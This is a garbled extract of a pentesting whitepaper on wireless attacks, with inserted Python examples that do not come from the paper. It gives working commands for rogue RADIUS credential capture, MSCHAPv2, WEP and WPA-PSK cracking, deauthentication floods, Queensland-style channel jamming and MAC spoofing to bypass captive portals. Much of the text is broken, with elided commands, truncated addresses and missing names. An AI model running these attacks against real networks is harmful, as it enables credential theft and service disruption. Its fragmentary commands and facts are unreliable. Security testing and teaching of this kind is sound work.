802 ... 0

Author:
Brad Antoniewicz
Senior Security Consultant
Foundstone Professional Services

www.foundstone.com | 1.877.91.FOUND
Introduction ... 4
Security and 802.11 ... 4
WPA/WPA2 ... 5
Equipment ... 6
Software ... 11
802.11 ... 11
The EAP Handshake ... 14
AP Impersonation ... 22
Rogue Access Points ... 23
Implementation Attacks ... 27
Dynamic WEP ... 33
WPA-PSK Cracking ... 38
EAP-MD5 Brute Force ... 39
Wireless Client Adapters ... 39
Denial of Service Attacks ... 41
Queensland DoS ... 45
Wordlist tips ... 46
... 802.11 wireless technologies for a couple years now and although things are starting to improve, I still do not see many step by step or “How to” guides that give detailed instruction on performing 802.11 ... org aside) ... There are some areas where I just point you in the right direction, usually towards the right tool, but ideally, these areas will be further described and covered in the next release of the paper ... Although I’ll provide a brief background into 802.11 ... 802.11 standard, but instead should provide you with adequate information to understand 802.11 ... I’ll continue to update this paper as I further experiment with new attacks, so please stay tuned for updates ...
Background
IEEE 802 ... More specifically, working group 11 of the 802 category for LAN/MAN technologies has been reserved for defining the standards of wireless local area networks (WLAN) operating in the 2.4GHz ... To ease the overwhelming increase of technical jargon, the term “Wi-Fi” has been adopted to refer to the IEEE 802.11 ... It should be noted that the Wi-Fi Alliance had first coined the term to define a slightly different set of standards; however, it is still commonplace to use the terms [IEEE] 802.11 ... Since its initial release in 1997, 802.11 ... Each amendment to the original IEEE 802.11 ... Amendments A, B, G, N, and I are the most recognizable as they’ve made notable changes to the original standard ... 802.11 a/b/g/n generally define the implementation’s frequency spectrum and modulation ... 802.11a operates in the 5GHz spectrum, using OFDM to obtain a 54Mbit/s data rate, whereas 802.11 ... 2.4GHz spectrum using DSSS to obtain an 11Mbit/s data rate ... 802.11g expands on 802.11 ... 2.4GHz spectrum to match the 54Mbit/s data rate of 802.11 ... In addition to other enhancements, 802.11 ... IEEE 802 ... 802.11 standard ...
Security and 802.11
Due to the borderless nature of 802.11 ... Wired Equivalent Privacy (WEP) became the first attempt at security ... IEEE 802 ... Unfortunately, due to the early adoption of wireless technologies, WEP is still in use by many companies and consumers alike ... 802.11i, wireless technology vendors attempted to address the issues with WEP by releasing additional mechanisms to mitigate the risk of WEP implementations ...
crack WEP has been drastically reduced, meaning that no implementation of WEP should be considered secure ... 802.11i introduces two areas of authentication to the 802.11 ... WPA Enterprise leverages IEEE 802 ... 802.11 suite) which relies on the Extensible Authentication Protocol (EAP) to relay authentication messages from a wireless client (supplicant) through the access point (authenticator) to a RADIUS server (authentication server) ... However, when it is combined with more sophisticated and proven authentication mechanisms, such as TLS, it becomes a reliable means of authentication ... This string can be anywhere between 8 and 63 characters ... 802.11i standard was released ... To offer greater security, CCMP, an AES based encryption protocol, was released in the final IEEE 802 ... CCMP is currently the only cryptographically sound protocol for 802.11 ... The lack of a physical boundary, as previously relied on with standard Ethernet networks, is the major appeal of wireless networks to attackers ... With wireless networks, this is obviously not the case ...
802.11 standard ... 802.11 standard, clients must perform certain actions based on what the access point instructs them to do ... Unfortunately, management frames are sent unencrypted through the air and there is no mechanism to ensure the identity of the access point other than its Media Access Control (MAC) address ...
Equipment
Choosing the right equipment is a crucial step ... By planning ahead, you will end up saving yourself a great deal of time and heartache ... Over time, adapters may fail and yield less than accurate results, or you may need to perform a certain unexpected task which may require specialized hardware ...

Client Adapters - Over the past years, a number of different wireless client adapter chipsets have been deemed “the hacker’s choice” ... The most popular chipset in today’s 802.11 ... In addition to chipset, another concern is band ... 802.11 wireless networks only operate at 2.4GHz ... When choosing your client adapter, be mindful of which bands it supports, as this may be a deciding factor in the success of an attack ... 802.11 wireless adapters ...
Table 1: Popular Client Adapters

Client Adapter: Ubiquiti SuperRange Cardbus
Description: Basic Specs: Bands: 802.11 ... 2.4 and 5GHz; Transmit Power: 300mW; External Connectors: (2x) MMCX; Chipset: Atheros AR5213/AR2112. Very popular card due to its high transmit power, dual band support and external connectors ... URL: ...com/products_src...

Client Adapter: (name missing from extract)
Description: Bands: 802.11 a/b/g 2.4 ... Just about every Windows 802.11 ... URL: http://www...com/Products/Adapters/AGDualBandWirelessAdapters/WAG511...

Client Adapter: (name missing from extract)
Description: Bands: 802.11b/g 2.4 ... URL: http://www...net/servlet/the90/AWUS036H-Alfa-500mW-USB/Detail

Client Adapter: AirPCAP
Description: Basic Specs: Bands: 802.11 ... 2.4GHz. Deserves mention as it works well within Windows with tools such as Cain & Abel ... URL: http://www...com/products/airpcapclassic...

... 802.11 wireless adapter to serve as an access point within Linux, it may be preferable to purchase a standalone, off the shelf access point ...
Table 2: Good all-around access points

Access Point: Apple Airport Extreme Base Station
Description: Bands: 802.11 ... 802.11b/g (2.4 ... 802.11n operating at either 5GHz or 2.4 ... Combined with its relatively low price, it serves as a good, multipurpose addition to your toolkit ... (Looking for an OpenWRT/DD-WRT flash)

Access Point: Buffalo WHR-G54S running OpenWRT
Description: Bands: 802.11 ... 2.4GHz). Comments: OpenWRT (or DD-WRT) adds such a wealth of functionality to these low cost access points that they immediately become a must have addition to the toolkit ... (Although there is a Linux version available) Downsides: Only supports 802.11 ...
This concern has since faded due to the availability of Live Distributions ... It contains just about every tool, driver, and kernel patch that you could think of ... The common method of booting BackTrack is via USB stick ... remote-exploit ... iso or ... (This step is shown in the screenshot below)

Change boot priority within your BIOS to ensure it is set to boot off of USB ... bat. Follow the on screen instructions. This step is manufacturer specific, but you’ll want to look for “Removable Media” or “USB Drives” within your BIOS and move them above the primary hard disk ...

Figure 1: Reformatting the MBR on your USB stick
With your BackTrack USB stick inserted, start your computer ...
By simply observing the network using a wireless sniffer, the attacker can find a good amount of information concerning the wireless deployment ...

802.11 Beacons
Beacons are 802.11 ... By default, these frames have a range of fields containing connection related information such as SSID and supported data rates ... This information can aid in social engineering attacks, or aid the attacker in targeting access points with a large number of connected clients ... (i.e. ...) of the network ...
802.1x authentication with WPA-Enterprise
EAP Response Identity: Once a client finishes its basic association, the authenticator (access point) sends an “EAP Request Identity” to the client ... Some configurations may set this field to “anonymous” for security reasons, which tells the authentication server to rely purely on the credentials provided within the inner authentication protocol ... username of the client in this field, providing the attacker with enough information to manually test passwords ...

Performing the attack:
These messages are transmitted in the clear when a client is establishing connectivity to the wireless network ...

Figure 4: Username contained in the EAP Response Identity frame (Wireshark)
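As an added example (not code from the paper), the following Python parses EAP Response/Identity packets as they appear in the clear during the exchange above and flags outer identities that carry a real account name rather than an anonymous placeholder; the sample packets, the account names and the "anonymous" convention are constructed assumptions.

```python
"""Audit EAP Response/Identity packets for outer identities that expose a username.

Added example, not from the paper. EAP packet layout (RFC 3748):
code(1) | identifier(1) | length(2, big-endian, whole packet) | type(1) | type-data.
Code 2 = Response, type 1 = Identity; the type-data is the identity string.
"""
import struct

EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_TYPE_IDENTITY = 1
EAP_HEADER_LEN = 5


def build_eap_identity_response(identifier: int, identity: str) -> bytes:
    """Construct an EAP Response/Identity packet (used only to build sample input)."""
    data = identity.encode("utf-8")
    return struct.pack("!BBHB", EAP_CODE_RESPONSE, identifier,
                       EAP_HEADER_LEN + len(data), EAP_TYPE_IDENTITY) + data


def parse_eap_identity(packet: bytes):
    """Return the identity string from an EAP Response/Identity packet, or None.

    Request/Identity packets from the AP, other EAP types and packets whose
    length field does not fit the data are rejected.
    """
    if len(packet) < EAP_HEADER_LEN:
        return None
    code, _ident, length, eap_type = struct.unpack("!BBHB", packet[:EAP_HEADER_LEN])
    if code != EAP_CODE_RESPONSE or eap_type != EAP_TYPE_IDENTITY:
        return None
    if length < EAP_HEADER_LEN or length > len(packet):
        return None
    # Some supplicants NUL-terminate the identity; keep only the string part.
    return packet[EAP_HEADER_LEN:length].split(b"\x00", 1)[0].decode("utf-8", "replace")


def identity_exposes_username(identity: str) -> bool:
    """True when the outer identity is a real account name, not an anonymous placeholder.

    Assumption for this example: 'anonymous', optionally with a realm such as
    'anonymous@example.com', is the privacy-preserving outer identity.
    """
    user = identity.split("@", 1)[0].strip().lower()
    return user not in ("", "anonymous")


def audit_identities(packets):
    """Return (identity, exposed) for every Response/Identity among the packets."""
    findings = []
    for pkt in packets:
        ident = parse_eap_identity(pkt)
        if ident is not None:
            findings.append((ident, identity_exposes_username(ident)))
    return findings


# Constructed sample capture (all names made up): a Windows client sending its
# domain account in the clear, a client using an anonymous outer identity, and
# the AP's own EAP Request/Identity, which must be ignored.
SAMPLE_PACKETS = [
    build_eap_identity_response(1, "ACME\\jsmith"),
    build_eap_identity_response(2, "anonymous@acme.example"),
    struct.pack("!BBHB", EAP_CODE_REQUEST, 1, EAP_HEADER_LEN, EAP_TYPE_IDENTITY),
]

if __name__ == "__main__":
    for ident, exposed in audit_identities(SAMPLE_PACKETS):
        print(f"{ident!r}: {'USERNAME EXPOSED' if exposed else 'anonymous outer identity'}")
```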
These types of vulnerabilities are normally easy to take advantage of and are often the result of an oversight, or ignorance on the behalf of those responsible for the network ... This can be achieved by establishing an access point with the same SSID (Service Set Identifier) as the target network’s ... has configured its wireless network with the SSID of “AcmeCorp”, wireless clients will probe (a process where the client blindly sends broadcast requests to identify if the wireless network it is configured for is nearby) for that SSID ... An observant attacker can configure an access point to respond to “AcmeCorp” requests and ultimately trick the client into connecting to its access point ... Another important note is that as long as the client’s wireless adapter is turned on, the client system will always probe to see if it’s in range of the wireless networks for which it’s configured ...
Joshua Wright and myself have come together to release a modified version of FreeRADIUS (an open source RADIUS authentication server), named FreeRADIUS-WPE ... This attack targets EAP-TTLS and PEAP networks ... It is common, however, that client systems are not properly configured to validate the authentication server’s TLS certificate, or the client supplicant leaves the decision of whether or not to connect with a non-validated certificate ... Depending on the inner authentication protocol used, these credentials can be passed in clear text, or may be subject to a brute force attack ... It modifies the server so that it outputs the entire inner authentication data used when establishing EAP-TTLS and PEAP authentications ... 0 ... willhackforsushi ... html
ftp://ftp...org/pub/freeradius/freeradius-server-2...1...gz
Setting up the Access Point
The access point contains a relatively simple configuration as it is generally agnostic to most EAP types ... FreeRADIUS-WPE comes already configured to accept authentication requests from any user and any access point ... To make things easier, simply configure your access point to use FreeRADIUS-WPE’s default shared secret of “test” (without quotes) ...

Table 5: FreeRADIUS-WPE Access point configuration
RADIUS Server: Access Point setting defining where to forward EAP requests ...
RADIUS Shared Secret: ... By default, FreeRADIUS-WPE is set with the shared secret of “test” ...

Figure 6: WPA-Enterprise configuration on OpenWRT
Another important thing to mention is that although I am using an off the shelf access point for this setup, you may just as easily use hostapd (http://hostap...fi/hostapd/) to combine all elements of the attack into a single machine ... All configuration files have been set up to accept any authentication and return successful for most authentication attempts ...
Table 6: FreeRADIUS-WPE installation
Extract the FreeRADIUS 2...1 source (Fig. ...): ...0...tar...
Copy the FreeRADIUS-WPE patch into the extracted directory (Fig. ...1...0...7); cd freeradius-server-2...1/
Patch the FreeRADIUS source using the FreeRADIUS-WPE patch (Fig. ...1...7): ...
(step description missing from extract): ./configure && make && make install && ldconfig
Change into the certificates directory (Fig. ...): cd /usr/local/etc/raddb/certs
Generate certificates using the bootstrap script (Fig. ...): ./bootstrap

Figure 8: Generating certificates
Once FreeRADIUS-WPE has been installed, it is all ready to run ...
Table 7: FreeRADIUS-WPE Defaults and key files
/usr/local/etc/raddb: General configuration directory for the default installation of FreeRADIUS
/usr/local/var/log/radius/freeradiusserver-wpe...: Default WPE log file location, stores all captured credentials
...conf: Enables/Disables EAP types; the majority should be enabled by default
/usr/local/etc/raddb/users: Local users file for all user accounts; it should contain default entries so users are automatically accepted
/usr/local/etc/raddb/clients.conf: Contains all of the RADIUS clients (i.e. access points); by default it should have all RFC 1918 addresses included
(path missing from extract): General FreeRADIUS configuration file; the “wpelogfile” setting defines where WPE should log its captured credentials

Once your setup is completed, simply start “radiusd” and let it run in the background ... Figure 9 shows two clients connecting; one using PEAP ... Because PAP is clear text, you’ll notice the password itself is directly output ...
Figure 9: FreeRADIUS-WPE in action
The first entry in Figure 9 displays a user connecting with PEAP using MSCHAPv2 as its inner authentication protocol ... One notable item here is that it is extremely common for Windows clients to use domain authentication during this process, meaning that if the MSCHAPv2 credentials are brute forced, the attacker now has access to the Windows Domain!

Cracking MSCHAPv2
Now that we have the MSCHAPv2 challenge and response, we can use ASLeap to crack these directly from the command line ... willhackforsushi...1/asleap-2...tgz
... txt
-C: Specifies the Challenge
-R: Specifies the Response
-W: Specifies the dictionary
Default Configurations
Wireless device manufacturers have made it possible for the average home user to take advantage of wireless technologies by making them easy to set up and configure ... Because of these reasons, it is very common for Small Office / Home Office (SOHO) users to set up a completely unsecured wireless network, not changing any of the manufacturer default settings ... becomes a huge risk as attackers can target these unprotected networks and gain complete control over them with little effort ... Finally, it should be noted that default configuration attacks are not only applicable to SOHO users, but are often found in corporate settings due to negligence by responsible parties ...

Rogue access points are a huge and often overlooked threat to corporate networks ... Additionally, rogue access points can be set up by an attacker purposefully to obtain unauthorized access to the network later on at his/her leisure ... Using an off the shelf device, an attacker can easily set up an AP to perform traffic monitoring or just offer a wireless backdoor into your network ...
WKnock-ng was created by Laurent Oudot to make it more difficult for opportunistic attackers to detect wireless access points and attack them ...
WKnock-ng: http://www...org/oudot/wknock/
OpenWRT: http://www...org

Captive Portal Circumvention
A captive portal is, essentially, a technique in which all user traffic is trapped and redirected to a particular destination ... The client is usually redirected to a web-based authentication page which requires valid login credentials (or agreement to an acceptable use policy) before permitting the client to access the internet ... 802.11 wireless networks most often as a means of providing guest internet access ...
This is accomplished by changing the wireless adapter’s MAC address to match that of an already connected client ... Note: You must wait until the previously authenticated client is off the network before assuming their MAC address ... To make life really easy, BackTrack includes “macchanger” ... This utility works excellently ... So to make sure that everything works properly, I’ve created the following script to change your MAC address without issues when using an Atheros adapter ...
#!/bin/sh
# athmacchange.sh - Atheros MAC Changer
# by brad a
# foundstone
#
if [ -z "$1" ]; then
    echo "Atheros MAC Changer"
    echo "----------------------"
    echo "IMPORTANT: this assumes we want to change the MAC of wifi0"
    echo "    if you want to change the MAC of another wifi interface"
    echo "    (i.e. wifi1, wifi2, etc...) ..."
    # (the rest of the usage message is missing from this extract)
    exit 1
fi
echo "-Destroying VAPs:"
# every madwifi VAP (ath0, ath1, ...) has an entry under /proc/net/madwifi
for i in $( ls /proc/net/madwifi ); do
    wlanconfig "$i" destroy > /dev/null 2>&1
    echo -e "\t$i - destroyed"
done
echo "-Downing wifi0"
ifconfig wifi0 down
echo "-Using macchanger to change MAC of wifi0"
macchanger -m "$1" wifi0
echo "-Bringing wifi0 back up"
ifconfig wifi0 up
echo "-Bringing up one VAP in station mode"
# create a fresh VAP (athN) on wifi0 so that it picks up the new MAC
wlanconfig ath create wlandev wifi0 wlanmode monitor -bssid > /dev/null
echo "-All done!"
echo "-Confirm your settings:"
echo "------------------------------------------------------"
ifconfig wifi0
echo "------------------------------------------------------"

Figure 11: athmacchange.sh
If you’re lucky however, your driver may already permit this, so it’s worth a check into the advanced section of your adapter’s driver properties ...

Figure 12: Changing MAC address in Windows Advanced adapter properties
DNS Tunneling: DNS Tunneling is an extremely useful technique in circumventing captive portals as well as outbound Internet access filters ... The attacker leverages the queries that support somewhat lengthy fields and uses the default name server to relay the messages between the client and the attacker’s server ... With SSH access, an attacker can effectively gain completely unrestricted outbound access by tunneling other protocols through SSH ...
OzymanDNS: http://www...com/ozymandns_src_0...tgz
SSH Tunneling Step by Step: http://www...com/wiki/Main/SSHOverDNS
Excellent DNS tunneling document: http://www...be/maarten/dnstunnel...
Implementation Attacks
Implementation attacks target systemic issues within the way IEEE 802.11 ...

WEP Cracking:
WEP is widely publicized as an insecure protocol; so much so that in 2005, the FBI demonstrated defeating WEP in approximately three minutes ... Named “aircrack-ptw”, this attack confirms WEP’s deficiencies by greatly reducing the time it takes to recover a key ... Aircrack-ng ... Also, since aircrack-ng 0...0, the aircrack-ptw attack has been included ... aircrack-ng...php
http://www...org/doku...

Dynamic WEP operates very similarly to the way WPA Enterprise works by relying on IEEE 802 ... The obvious difference between WPA Enterprise and Dynamic WEP is the use of WEP for data encryption ... As its name implies, the broadcast key is a shared key which is used to encrypt broadcast traffic ... Without possibly affecting users, the safest and lowest amount of time between key rotations is 5 minutes ... So now the attacker can inject and decrypt within the timeframe the key remains constant ...
Performing the Attack
To identify when the key is being rotated, take about 30 minutes and capture all the traffic you can ... Although this can be useful, in practice I’ve never needed to time my attacks so precisely ... For 802 ...

CiscoAP1#sh run
Building configuration...
...3
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname CiscoAP1
!
logging console informational
enable secret 5
!
ip subnet-zero
!
!
aaa new-model
!
!
aaa group server radius radius_servers
server 192...11...
!
!
ssid DynamicWEPTest
!
speed basic-1...0 basic-5...0
no power client local
power client 5
channel 2437
station-role root
infrastructure-client
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
bridge-group 1 spanning-disabled
!
interface FastEthernet0
no ip address
no ip route-cache
duplex auto
bridge-group 1
no bridge-group 1 source-learning
bridge-group 1 spanning-disabled
!
interface BVI1
ip address 192...11... 255...0
no ip route-cache
!
ip http server
no ip http secure-server
ip http help-path http://www...com/warp/public/779/smbiz/prodconfig/help/eag
ip radius source-interface BVI1
!
radius-server host 192...11...
This is because when we’re cracking WEP, we’re usually focusing on injection techniques that inject broadcast frames ... This step should be pretty straightforward ... This should automatically create a monitor mode Virtual AP (VAP) ...
...sh $CL
Launch the ChopChop attack and filter broadcast traffic ...
... 255...255 -l 255...255 ...xor -w arprequest... (Be sure “airodump-ng” is capturing the traffic)
While that’s running, start aircrack-ng and crack the key (1 ... If there is a lot of traffic, you may just want to wait and then filter only broadcast traffic from the capture:
aireplay-ng --interactive -x 512 -r arprequest...
bkey-01...

Figure 14: ChopChop Frame selection and attack (Broadcast key)

Session Key – Although not extremely complicated, the session key is slightly more difficult to crack ... Therefore, in order to actually crack the session key, you’ll have to use more strict filtering rules ...
Launch the ChopChop attack ... Once you’ve gotten the PRGA file, use packetforge-ng again, but use the decrypted replay_dec[whatever] ... With that information, you can specify a targeted ARP request to an IP on the same subnet:
packetforge-ng --arp -a $AP -h $CL -c 00:0C:29:75:F1:14 -k 192...11...168...78 -w arprequest...xor
Be sure airodump-ng is capturing the traffic ...
...skey ath0
Start aircrack-ng again to crack the key ... Then, filter all the unicast traffic so it doesn’t mess up aircrack ...
aircrack-ng DynamicWEP...cap

Figure 15: ChopChop Frame selection and Attack (Session Key)

Troubleshooting: The main issue I see when performing this attack is that Aircrack-ng doesn’t work well with 802 ... You’ll know if this is your problem if you open your capture in Wireshark ... Unfortunately, I don’t have an immediate solution to this issue ...
This attack demonstrated that an attacker can recover a WEP key without being in the vicinity of the corporate wireless network by targeting isolated clients in public areas such as airports or coffee shops ... It’s unclear whether Sergey was first to develop the idea ... Unfortunately, I haven’t had much luck with wep0ff but, since it’s the only publicly released tool which demonstrates this attack, it deserves mention ... ptsecurity ... tar ... This can be forced by leveraging the de-authentication denial of service attack ... As you review these attacks, keep an eye on the speed at which the key is cracked ... churchofwifi ... These tables were generated using a list ...
It should be noted that the hash captured during the 4-way handshake is generated using the SSID of the network, meaning that these rainbow tables are SSID dependent ... You’ll see below the drastic difference in speed when using rainbow tables ...
...churchofwifi...txt
http://umbra...com:6969/torrents/wpa_psk-h1kari_renderman...
...net/gps/gps/main/ssidstats
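The SSID dependence comes from how WPA-PSK turns the passphrase into the pre-shared key: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), so the SSID is the salt. The added example below (not the paper's code nor any of the tools it names) derives that key, builds a small precomputed table for one SSID and shows that the same passphrase on a different SSID is not found in it; the wordlist and the "linksys"/"IEEE" SSIDs are constructed values, and the "password"/"IEEE" result is the IEEE 802.11i Annex H test vector.

```python
"""WPA-PSK key derivation: why precomputed PMK tables are SSID dependent.

Added example, not the paper's code. WPA/WPA2-Personal derives the 256-bit
pairwise master key as
    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
so a table of precomputed PMKs only applies to the SSID it was built with.
"""
import hashlib


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 32-byte PMK for a WPA/WPA2-Personal network (IEEE 802.11i, Annex H)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be between 8 and 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def build_pmk_table(ssid: str, wordlist):
    """Precompute PMK -> passphrase for one SSID, the way an SSID-specific
    rainbow table is built; words outside the 8..63 character range are skipped."""
    table = {}
    for word in wordlist:
        if 8 <= len(word) <= 63:
            table[derive_pmk(word, ssid)] = word
    return table


def lookup_passphrase(table, pmk: bytes):
    """Return the passphrase behind a PMK if the table contains it, else None."""
    return table.get(pmk)


def table_transfers(table, other_ssid: str) -> bool:
    """True if any passphrase in the table yields a PMK that is also in the table
    when derived for other_ssid. Expected to be False: the SSID is the PBKDF2 salt."""
    return any(derive_pmk(word, other_ssid) in table for word in table.values())


# Constructed wordlist (made-up values) and two SSIDs: only one matches the table.
SAMPLE_WORDS = ["short", "password", "letmein1", "correct horse battery"]
TABLE_SSID = "linksys"
OTHER_SSID = "IEEE"

if __name__ == "__main__":
    table = build_pmk_table(TABLE_SSID, SAMPLE_WORDS)
    captured = derive_pmk("password", TABLE_SSID)   # stands in for a recovered PMK
    print("linksys lookup:", lookup_passphrase(table, captured))
    print("same passphrase on IEEE:", lookup_passphrase(table, derive_pmk("password", OTHER_SSID)))
    print("table transfers between SSIDs:", table_transfers(table, OTHER_SSID))
```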
...dump -s linksys -d /wpapsk-tables/xai-0/linksys
-r: ...
-s: Specify the SSID of target network
-d: ...

...dump
-w: Specifies the dictionary file to use
The last attribute is the capture of the 4-way handshake
coWPAtty: coWPAtty is another WPA-PSK cracking tool which can accept input from standard in as a wordlist for its dictionary attack ...
...dump -s "linksys"
-f: Specifies the dictionary to be used
-r: Specifies the PCAP file containing the 4-way handshake
-s: Specifies the SSID of the target network
We can use “john the ripper” to create a nicely mangled wordlist and output it to standard out so that we can redirect the output to coWPAtty (see the “Wordlist Tips” section for more information) ...
...lst --rules --stdout | cowpatty -r wpapsk-linksys...
This was further demonstrated using the “asleap” tool ...
ASLeap: http://www...com/code/asleap/2...1...

By capturing the handshake, it is possible to launch an offline brute force attack against it ...

Performing the Attack
eapmd5pass: To demonstrate this attack, Joshua Wright created the eapmd5pass tool ...
eapmd5pass -r EAPMD5-Challenge-01... ...txt
-r: Specify a capture file containing the EAP-MD5 challenge handshake
-w: Specify a wordlist to test the handshake against
These attacks stem from the lack of proper bounds checking and other issues most commonly found in applications ...

Wireless Client Adapters
In recent years, a number of vulnerabilities were identified in wireless adapter drivers which allowed remote compromise ... Another issue identified in Intel wireless device drivers also yielded the same results on Windows systems ...

Fuzzing
Due to the closed source nature of Windows device drivers and wireless infrastructure devices, vulnerability discovery is often left up to the work of fuzzing ... This process can result in the application crashing, often indicating a lack of proper bounds checking ... This process is usually performed in a testing environment, rather than used as an active attack ... 1 now supports Lorcon (http://802...net/lorcon); a generic library for frame injection ... Metasploit 3 ... 802.11 modules; some of which support 802.11 ...
Metasploit: http://www...com/
This presentation is a required read if you are getting into the realm of 802.11 ...
Raw Wireless Tools: http://rfakeap...org/
“Wi-Fi Advanced Fuzzing” Presentation: http://www...com/presentations/bh-europe-07/Butti/Presentation/bh-eu07-Butti...
... 802.11 fuzzing in mind ...
Airbase: http://www...11mercenary...tar...
I haven’t had very good luck with it; however, it is seen to be very powerful because of its Python base ... secdev ...
Denial of Service Attacks
Denial of Service attacks result in a disruption of the connection between an authorized client and the access point ... 802.11 wireless networks are more susceptible to these types of attacks because the standard heavily relies on the use of MAC addresses for identification ... 802.11 standard defines certain conditions where the client must obey an instruction originating from the access point to which it is associated ... 802.11 management frames in a way which tricks the client into thinking the access point wishes it to disconnect ... However, by flooding the client with de-authentication frames, an attacker can effectively force the client to constantly reconnect and disconnect ... Using the BackTrack Linux distribution, you should be able to perform this attack with ease ...

Aircrack-ng Suite: To perform the attack using the Aircrack-ng Suite, simply type:
aireplay-ng --deauth 25 -h ...
--deauth: Specify de-authentication attack with number of deauth frames to send
-h: Target MAC Address
-b: AP MAC Address
ath1: Injection interface

... 802.11 injection tool ... 802.11 frames to be injected within its packets directory ... To perform a DeAuth attack using File2Air, simply:
file2air -i ath0 -n 65000 -d packets/deauth...

MDK2 is cool because of its “mass deauth” feature which is meant to disconnect everyone within range ... To perform the DeAuth attack using mdk2:
/pentest/wireless/mdk2-v31/mdk2 ath0 d
ath0: Interface to use for injection
d: Tells mdk2 to run Deauth Amok Mode
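From the defender's side, a de-authentication flood has an obvious footprint in a monitor-mode capture. The added example below (not code from the paper) parses raw 802.11 management frames, picks out deauthentication frames and alerts when one BSSID/source pair exceeds a per-window threshold; the window, the threshold and every MAC address in the sample are constructed assumptions.

```python
"""Detect de-authentication floods in raw 802.11 management frames.

Added example, not from the paper. A deauth frame is a management frame
(type 0) of subtype 12; its 24-byte MAC header is followed by a 2-byte reason
code. The detector counts deauths per (BSSID, source) in a sliding window and
alerts once the count passes a threshold, the footprint of the floods above.
"""
import struct
from collections import defaultdict, deque

TYPE_MANAGEMENT = 0
SUBTYPE_DEAUTH = 12
HEADER_LEN = 24
WINDOW_SECONDS = 2.0   # assumption: tune to the environment
THRESHOLD = 10         # assumption: deauths per window from one source before alerting


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_deauth(frame: bytes):
    """Return (dest, source, bssid, reason_code) for a deauth frame, else None."""
    if len(frame) < HEADER_LEN + 2:
        return None
    fc0 = frame[0]                       # first byte of the frame control field
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    if ftype != TYPE_MANAGEMENT or subtype != SUBTYPE_DEAUTH:
        return None
    dest, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack("<H", frame[HEADER_LEN:HEADER_LEN + 2])
    return mac_str(dest), mac_str(src), mac_str(bssid), reason


class DeauthFloodDetector:
    def __init__(self, window=WINDOW_SECONDS, threshold=THRESHOLD):
        self.window = window
        self.threshold = threshold
        self.seen = defaultdict(deque)   # (bssid, source) -> recent timestamps
        self.alerted = set()

    def observe(self, ts: float, frame: bytes):
        """Feed one timestamped frame; return an alert string or None."""
        parsed = parse_deauth(frame)
        if parsed is None:
            return None
        _dest, src, bssid, reason = parsed
        key = (bssid, src)
        recent = self.seen[key]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()             # drop timestamps outside the sliding window
        if len(recent) > self.threshold and key not in self.alerted:
            self.alerted.add(key)
            return (f"deauth flood: {len(recent)} frames in {self.window}s "
                    f"from {src} on BSSID {bssid} (last reason code {reason})")
        return None


def build_deauth(dest: bytes, src: bytes, bssid: bytes, reason: int, seq: int = 0) -> bytes:
    """Construct a deauth frame (sample input only): FC, duration, 3 addresses, seq, reason."""
    fc = bytes([(SUBTYPE_DEAUTH << 4) | (TYPE_MANAGEMENT << 2), 0x00])
    return (fc + b"\x3a\x01" + dest + src + bssid
            + struct.pack("<H", seq << 4) + struct.pack("<H", reason))


def run_detector(events, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """events: iterable of (timestamp, frame). Return the list of alerts raised."""
    detector = DeauthFloodDetector(window, threshold)
    alerts = []
    for ts, frame in events:
        alert = detector.observe(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample (all addresses made up): one ordinary deauth at t=0, then a
# burst of 25 broadcast deauths spoofed from the AP's address, 50 ms apart.
AP = bytes.fromhex("00112233aabb")
CLIENT = bytes.fromhex("00aabbccdd01")
BROADCAST = b"\xff" * 6
SAMPLE_EVENTS = [(0.0, build_deauth(CLIENT, AP, AP, reason=3))] + [
    (10.0 + i * 0.05, build_deauth(BROADCAST, AP, AP, reason=7, seq=i)) for i in range(25)
]

if __name__ == "__main__":
    for alert in run_detector(SAMPLE_EVENTS):
        print(alert)
```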
Coined after the Queensland University of Technology, this attack demonstrates that if a card is placed into continuous transmit mode on a specific channel, all wireless activity in the immediate vicinity on that channel is halted ...

Performing the Attack:
Atheros Chipsets - In order to obtain FCC approval for their drivers, the Madwifi team had to build continuous transmit functionality into the DFS branch ...
Download the madwifi-dfs source: ...madwifi...
Modify if_ath_radar.c:
- Line 152: remove "inline" from the function prototype of interval_to_frequency
- Line 851: remove "inline" from the function declaration of interval_to_frequency
Compile and install: make && make install
Insert adapter and bring up interface: ifconfig ath0 up
Set interface to target channel: iwconfig ath0 channel 6
Place card into continuous transmit mode: iwpriv ath0 txcont 1
Stop continuous transmit mode: iwpriv ath0 txcont 0

Figure 19: Performing the Queensland Denial of Service attack

Prism Chipsets – Using a Prism based wireless adapter, the Queensland DoS can be performed with the Prism Test Utility ... Simply select the adapter and channel then click “Continuous Tx” ... To obtain the Prism Test Utility, try Googling for “PrismTestUtil322” ... zip
PrismTestUtil322...
Miscellaneous
This section is dedicated to the items that are not specifically 802.11 ... 802.11 wireless attacks ... Whether you’re trying to brute force a pre-shared key or MSCHAPv2 credentials, it’s beneficial to know the different techniques we can use to generate a good wordlist to test ...
...lst: ftp://ftp...com/pub/wordlists/all...
Church of WiFi WPA-PSK rainbow tables wordlist: ...churchofwifi...zip
BackTrack’s included wordlist: /pentest/password/dictionaries/wordlist...

John the Ripper can do a good amount of this using its permutation rules ...
john --wordlist=all...
... ini)
...: Output words to standard out
